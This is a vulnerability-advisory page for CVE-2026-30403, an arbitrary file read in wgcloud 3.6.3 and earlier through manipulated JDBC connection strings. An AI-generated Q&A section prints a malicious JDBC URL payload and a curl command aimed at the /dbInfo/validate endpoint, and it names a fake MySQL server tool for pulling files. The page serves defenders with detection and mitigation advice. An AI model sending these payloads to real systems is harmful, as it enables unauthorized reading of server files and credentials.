CVE-2026-30403
Arbitrary File Read in wgcloud Backend Database Management
Publication date: 2026-03-19
Last updated on: 2026-04-02
Assigner: MITRE
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| wgstart | wgcloud | to 3.6.3 (inc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-22 | The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
[{'type': 'paragraph', 'content': 'CVE-2026-30403 is an arbitrary file read vulnerability found in the test connection function of the backend database management system in wgcloud versions 3.6.3 and earlier.'}, {'type': 'paragraph', 'content': 'The vulnerability arises because the JDBC connection string parameters in the test connection function can be manipulated to exploit options like allowLoadLocalInfile and allowUrlInLocalInfile, which improperly handle file loading.'}, {'type': 'paragraph', 'content': "By injecting specially crafted payloads into the JDBC URL, an attacker can read any file on the victim's server without authorization."}, {'type': 'paragraph', 'content': 'This flaw is related to how the MySQL Connector/J processes URL parameters and can be exploited via the endpoint http://ip:port/dbInfo/validate.'}] [2]
How can this vulnerability impact me? :
This vulnerability allows an attacker to read arbitrary files on the server hosting wgcloud, potentially exposing sensitive information such as configuration files, credentials, or other private data.
Unauthorized file access can lead to further attacks, including privilege escalation, data breaches, or system compromise.
Because the vulnerability is exploitable through the backend database management interface, it poses a significant security risk to the confidentiality and integrity of the affected system.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
I don't know
How can this vulnerability be detected on my network or system? Can you suggest some commands?
[{'type': 'paragraph', 'content': 'This vulnerability can be detected by checking if the vulnerable endpoint `http://ip:port/dbInfo/validate` is accessible and if it accepts JDBC connection strings with parameters that enable arbitrary file reading.'}, {'type': 'paragraph', 'content': 'One way to test is to send crafted requests to the endpoint with payloads such as `jdbc:mysql://ip:port/dbname?allowLoadLocalInfile=true&allowUrlInLocalInfile=true&maxAllowedPacket=655360#` and observe if files on the server can be read.'}, {'type': 'paragraph', 'content': 'Additionally, setting up a fake MySQL server listening on port 3307 using tools like https://github.com/fnmsd/MySQL_Fake_Server can help simulate and detect exploitation attempts.'}, {'type': 'list_item', 'content': 'Use curl or similar tools to send a request to the vulnerable endpoint with the malicious JDBC URL payload.'}, {'type': 'list_item', 'content': 'Example curl command: curl -X POST -d \'{"jdbcUrl":"jdbc:mysql://ip:port/dbname?allowLoadLocalInfile=true&allowUrlInLocalInfile=true&maxAllowedPacket=655360#"}\' http://ip:port/dbInfo/validate'}, {'type': 'list_item', 'content': 'Monitor network traffic for suspicious JDBC connection strings containing `allowLoadLocalInfile` or `allowUrlInLocalInfile` parameters.'}] [2]
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include restricting access to the vulnerable endpoint `http://ip:port/dbInfo/validate` to trusted users only.
Avoid using or accepting JDBC connection strings that include the parameters `allowLoadLocalInfile=true` and `allowUrlInLocalInfile=true`.
If possible, upgrade wgcloud to a version later than 3.6.3 once a fix is confirmed, or apply any available patches from the vendor.
Implement network-level controls such as firewall rules to block unauthorized access to the backend database management interface.
Monitor logs for unusual access patterns or attempts to exploit the JDBC connection string parameters.